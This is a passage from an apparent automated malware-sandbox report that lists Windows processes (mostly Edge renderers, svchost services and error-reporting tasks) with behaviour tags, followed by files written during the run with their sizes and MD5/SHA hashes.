                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                                                                                                              3⤵
                                                                                                                                PID:4784
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
                                                                                                                                3⤵
                                                                                                                                  PID:376
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
                                                                                                                                  3⤵
                                                                                                                                    PID:5344
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
                                                                                                                                    3⤵
                                                                                                                                      PID:5356
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3564 /prefetch:8
                                                                                                                                      3⤵
                                                                                                                                        PID:5616
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3564 /prefetch:8
                                                                                                                                        3⤵
                                                                                                                                          PID:6024
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
                                                                                                                                          3⤵
                                                                                                                                            PID:2028
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
                                                                                                                                            3⤵
                                                                                                                                              PID:5676
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
                                                                                                                                              3⤵
                                                                                                                                                PID:5940
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
                                                                                                                                                3⤵
                                                                                                                                                  PID:5204
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6128
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5428
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5420
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3556
                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3736
                                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3888
                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                            PID:3540
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:4672
                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4496
                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:960
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1776
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  PID:3652
                                                                                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  PID:1708
                                                                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1200
                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4748
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3748
                                                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4712
                                                                                                                                                                        • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                                          C:\Windows\System32\WaaSMedicAgent.exe 6d1e19e015ed7bdd63e61ecc1fea0720 XThSFs78H0qEqnd5PuqJSQ.0.1.0.0.0
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Sets service image path in registry
                                                                                                                                                                          PID:5000
                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1112
                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4652
                                                                                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                              PID:2940
                                                                                                                                                                            • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                              C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:1684
                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:396
                                                                                                                                                                                • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                                  C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:4784
                                                                                                                                                                                • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                                  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:1288
                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                    PID:2816
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 440 -p 1516 -ip 1516
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:2508
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 480 -p 5048 -ip 5048
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                      PID:2876
                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 428 -p 5048 -ip 5048
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2092
                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3968
                                                                                                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1264
                                                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:3848
                                                                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:1756
                                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:3152
                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5628
                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5864

                                                                                                                                                                                                  Network

                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER3880.tmp.csv

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    38KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    3781807479b7887b47afc6b86a274eed

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    ad73e5bcc9a50b1e5ac656b8611a581686852021

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    2661c5d7a5e86ed0dc947d53a4f4653eebe85088fe9bb4a86ae92b631c14026c

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    d45af03e654c43853ab90555c4bf58a0edc980e5fb12494189b233ae99a279fc33669664e8d13e56474e2fa35d60c01762ca829ebf69a243c0796395899e9573

                                                                                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER38A0.tmp.txt

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    13KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    2b98967f1c11da511c265d7b4acbdd08

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    c707e904e6210162105d0d864f7664ffd52ca519

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    ce7778aa09c3d50875ff1c7949a06ab31db1b4f5e5f73de69be8a67e1b99339b

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    bc13119cff31bb5c2acc249d797c3d586e0dcd8f82908a4fa8783da9ba55d89d6e2723ce0b7469c0fabc639d2b32dd1c04963a2a537942af075e81c522207f12

                                                                                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF48.tmp.csv

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    38KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    9c0e4a1e71ade64d4d0f02d2a87927eb

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    4b8a8f04ee6fafd69003a5d56c1f38403821d471

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    9706acdb52fa2b495e7f7b5ab91c821ba2681c6df142933c50490c57d5a98c02

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    4ac3ccb881af1987effbdf852ef04df812c80f1e8f38f085ff8ddb12e3f7a8d5a12638e5af24779bb305c5986cba80883ac2ff68ee46a53fc6725f96201d2d0e

                                                                                                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFB6.tmp.txt

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    13KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    9a834b7ee3d4eff2da80c8b9d305e453

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    c8543c6cc70a80d03b25384822f88e7a66ccb58b

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    363b2adec15eb3277257ba40071174c58efec7cc90e38526e9b866ff4ddb84b2

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    456be50a5bf0db14047390eabceaf503badc057753f00847b9d8b648b1aac893d448d79998ad0c75c6618ced0f3a024ff76b304e8e55df904c33d687dc90172a

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    3KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    bb8306e1bcf2e988e16c1aee4383f269

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    3f261ea9b6df59d223f7c61adddc7f6f515e6e4e

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    859eb6128cadf870e8235e87af15e13e6243b84690f641612be03c8dd83c4b98

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    ad95bd6d26de7cea5ddaa4c3d92ced71899be98bac8593fed13b815a25eccd71817300f0cde97d87d3722515691a4a82a7d2d06a832d6181f05ccd73649247d3

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    152B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e443ee4336fcf13c698b8ab5f3c173d0

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    9bf70b16f03820cbe3158e1f1396b07b8ac9d75a

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    152B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    56a4f78e21616a6e19da57228569489b

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    21bfabbfc294d5f2aa1da825c5590d760483bc76

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    840B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    2f0587f69e9ec632e2f1b347e815542b

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    7827e9c86ba7d4ffdafa326e8677c2f912dbb1ec

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    9415d021b90db4d1c3b4c4dff04278a803769fd2658920c5c96bb4a74216c893

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    59518f0a5dc1d8516f587d4b09baa399011baa727db199b85ff749e7e8a10c9582a7f366fa11a3be35a0e401f10f5a3aa107196f18d059f65ee5a7f62af2efdf

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    402B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    54c1d311012f48e50ac72e9b0d6b8e71

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    2a7569f5395a1efd20d031ed5e65c424b2e89861

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    a69b42b2df74adb169138aab69eca376a5148930e440e90d8a57404069b6f38a

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    9d1fa30376fa78197ae987410687c80463b5dbf518b7b789de8ec6809f58d3800033cd5c55a9573fcd842d656e7ead6ffb0f63841374e058558ae3ddc7f762f5

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    5KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    146844282f190dbc65c835b2afe06c47

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    d0d9a47cf03c819a66ccb62e435dc05a4d5b2f9a

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    73ae99df1485ac5e9040f445ca03c1d2173a7911f46933bca3185e3237a5795d

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    f3b5c3469b02d8b511e1eaef7ba8b4d830940d657ea9f01efd5a18f046bc1b72f219ecbbf97f249f278e952d0477be6272198cc8f4e3ba08785849d426df916d

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    f1f873dc0144be4483f033a2f399199c

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    bfd93161a4d46a05a9e1ebd8f46b3996057f7da1

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    465b28a90a97c6db39a641a4127f743420e08baaeaf02d1ce454184d3b3b6fb7

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    81c6ea964461f7d27b7af824b45da893e8b9ae4d4f834fbe8aebb5eb5e060000796de8d1668d814fd52e9060a023b397c98e71ea2cbea510b2d59568282f480a

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    5a8017e2503b78932e11d728441e15c2

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    6c3c13702d8915949154651c2460d878e78fbf3c

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    f4522f641c750830b1741f5f4883465b7c4198b9f42af307fe6b37fa521ff973

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    3c2378ddcef671900cbfc13e6b01e3d0da9c5a7f57634c4cd4766f6150d0e779a2a149b08f8732db68d48f7d9362d6cd5133b34ae0b9d098ee289254fa162038

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    16B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    206702161f94c5cd39fadd03f4014d98

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    16B

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    46295cac801e5d4857d09837238a6394

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f1320a5c-c54e-4bb2-a14a-96dfad9b4b6c.tmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    a4ec9e7c56d1c89bc6f642392454c8e2

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    03fd973d1e858eacb0150a37f233f1f33573aff2

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    117724eac08aae351c153f6945fa95a9420a479d1e5d0c1038bacb02ad0d4da0

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    696f98af228e065b12c232318c63aa2b4fc44fe601608143a12cf2f157d7d971bd1e25123e97a777a49cce73ce3d0ebfab0b71f28bc588ecbf8f8019f2b9b494

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    200475078885995b9d42792d775d88da

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    1f86ac896fdd90de063996bd1b322383f77e8b05

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    06cd810e2ee59256febc7809abb289292df1a8475814515d016ed718b014ed9f

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    e1d48afae62bd059c8c4bf3c0712347162bdbce9c860c4ecd59e9b1cbbd21593573ff0d7d222159faa70720341bfe0dc71de66dcb35a33bc7f72f0ff2f012750

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    10KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    b18cfae4ceacad12e68357716ff2781c

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    f0d665f4f9b4500971136105c2ebd1b6484436bd

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    378d25907fda7e5a046acba9c889814b0fa730fdf117c3593f58d5186e55d8f1

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    4c4ec091b2a7029ba21e7d64a255bee7640f3971e689a6d80a40d4a3c296b3cf3cbce660933b9ca6d4486b519356f1a3564d1ffb382202af0ed34c4c9e80afe1

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    53KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    a26df49623eff12a70a93f649776dab7

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    3KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    76a18ac328480a11da294618d5d31ffd

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    0224f6c541f3e833a9bbe76184ec4b2b5487fe62

                                                                                                                                                                                                    SHA256

